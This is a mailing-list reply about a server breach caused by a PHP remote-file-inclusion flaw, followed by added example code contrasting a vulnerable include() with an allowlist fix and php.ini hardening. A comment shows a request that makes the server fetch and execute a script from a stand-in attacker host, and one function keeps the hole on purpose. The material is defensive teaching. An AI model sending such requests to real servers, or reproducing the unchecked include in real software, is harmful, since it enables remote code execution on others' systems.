
Re: possible server compromitation



Jon Dowland writes on Mon 21. 08. 2006 at 19:05 +0100:
> On Mon, Aug 21, 2006 at 06:44:00PM +0200, David Siroky
> wrote:
> > Attackers deleted all access.log and error.log files
> > (which I had among the web files)
> 
> I assume by "among the web files" you mean you'd adjusted
> permissions on the logging directory so the apache user
> could write to them: by default, with apache2/debian, the
> www-data user cannot write to /var/log/apache2, and tampered
> logs would indicate a root-level exploit.
> 
> > I know that there is a security issue in mod_rewrite but I
> > don't use it.  Maybe PHP is unsafe. It is a mystery to me.
> 
> If you are correct and no root-level permissions were
> obtained, it is quite likely to be a badly written web
> application, rather than a vulnerability in apache2 or php
> itself.
> 

I finally found the hole. It was a badly written application
(fortunately not by me :-). The server has PHP directive
"allow_url_fopen on" and the application was passing one parameter
directly into include(...) without checking. The parameter was used to
include an enemy script.

Now I can sleep again :-)
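For readers who land on this thread later, here is the pattern David describes side by side with a hardened version. This is an added example, not code from the thread or from the application that was compromised; the parameter name `page`, the `pages/` directory and the file names are assumptions.

```php
<?php
// Added example, not from the original thread. Parameter and file names are assumed.

// --- Vulnerable: the request parameter reaches include() unchecked. ---
// With allow_url_fopen=On, a request such as
//   index.php?page=http://attacker.example/shell.txt
// makes PHP fetch the remote file and execute it as the web server user
// (www-data on Debian), which is all that is needed to delete writable logs.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    include($page);   // client controls a remote URL or a local path
}

// --- Hardened: map the untrusted value onto a fixed allowlist. ---
// The client never supplies a path, only a key; include() is only ever
// called with paths we wrote down ourselves.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $requested): string
{
    if (!array_key_exists($requested, PAGES)) {
        http_response_code(404);
        return PAGES['home'];   // fall back to a known file, never to the raw value
    }
    return PAGES[$requested];
}

function render_page_hardened(array $get): void
{
    $key = is_string($get['page'] ?? null) ? $get['page'] : 'home';
    include(resolve_page($key));
}

render_page_hardened($_GET);

// Defence in depth in php.ini; this does not replace the allowlist above:
//   allow_url_fopen   = Off          ; include()/fopen() no longer fetch http:// or ftp:// URLs
//   allow_url_include = Off          ; PHP 5.2 and later gate include/require of URLs separately
//   open_basedir      = /var/www/site ; confines file access, which also blocks ../../etc/passwd
```

Even with `allow_url_fopen` turned off, an unchecked `include($page)` still lets a client include any local file the web server can read, so the allowlist is the actual fix; the ini settings only limit the blast radius of the next application that gets it wrong.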


